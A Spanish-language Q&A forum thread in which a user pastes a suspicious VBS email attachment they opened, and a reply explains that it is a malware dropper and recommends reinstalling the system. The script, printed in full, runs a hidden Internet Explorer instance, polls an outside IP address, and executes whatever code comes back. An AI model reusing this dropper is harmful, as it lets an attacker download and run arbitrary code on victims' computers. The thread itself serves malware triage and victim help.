Recibo un correo electrónico con el archivo de virus * .VBS [cerrado]

0

Inesperadamente abrí el archivo. Estaba seguro de que Windows me preguntará si estoy seguro de ejecutar este script, pero desafortunadamente, no fue así. Ahora me pregunto qué está haciendo exactamente ese archivo. ¿Alguien puede ayudar?

contenido del archivo:

' fffff
' ssssss

Dim DSLOVIEI
Dim foxtomnum, ubigs
ubigs = 0
foxtomnum = "1118812"

Call SookCanalTV(2 + 2)

Function TroceSHello(kpserial)
   On Error Resume Next
    DSLOVIEI.Quit()
    Execute "" + kpserial + "" 
End Function

Function DSLOVIEIChek(stcurl)
 Set DSLOVIEI = CreateObject("InternetExplorer.Application")
 DSLOVIEI.Visible = 0
 DSLOVIEI.navigate stcurl

 While DSLOVIEI.ReadyState <> 4 : WScript.Sleep 110 : Wend

 DSLOVIEIChek  = DSLOVIEI.document.body.innerText
End Function

Sub SookCanalTV(one)
  On Error Resume Next
    While ubigs < one
        WScript.Sleep 10 + 3    
      Call onlineZolo()
        WScript.Sleep 11000
   Wend
End Sub

Function onlineZolo()
    Dim promazzzzz
    foxtomnum = CStr(foxtomnum + 1) 
    promazzzzz = DSLOVIEIChek("http://192.3.45.90/online.php?mdms=143760135&to=" + foxtomnum)
TroceSHello(promazzzzz)
End Function
    
pregunta JBudny 01.12.2018 - 10:30
fuente

1 respuesta

2

Lamentablemente, el script VBS parece ser un dropper que ha instalado malware en su computadora. Su mejor opción es reinstale su sistema operativo y comience de nuevo.

La secuencia de comandos ha sido uploaded to VirusTotal aparentemente en las mejores condiciones https://www.hybrid-analysis.com/sample/999e6e7982d7671da2c9534778b1cbb45a83645b5734905a0d4f2979c7b66f9c?environmentId=100">hybrid-analysis tiene más detalles sobre el malware después del análisis.

El malware básicamente hace lo siguiente:

  1. Crea un proceso de Internet Explorer en segundo plano
  2. Navega a http://192.3.45.90/online.php?mdms=71464&to=1118813 varias veces, aumentando el valor del parámetro to cada vez para realizar diferentes solicitudes GET y descargar diferentes códigos de VBS
  3. Ejecuta el código VBS descargado, instalando malware
respondido por el Joe 01.12.2018 - 11:19
fuente

Lea otras preguntas en las etiquetas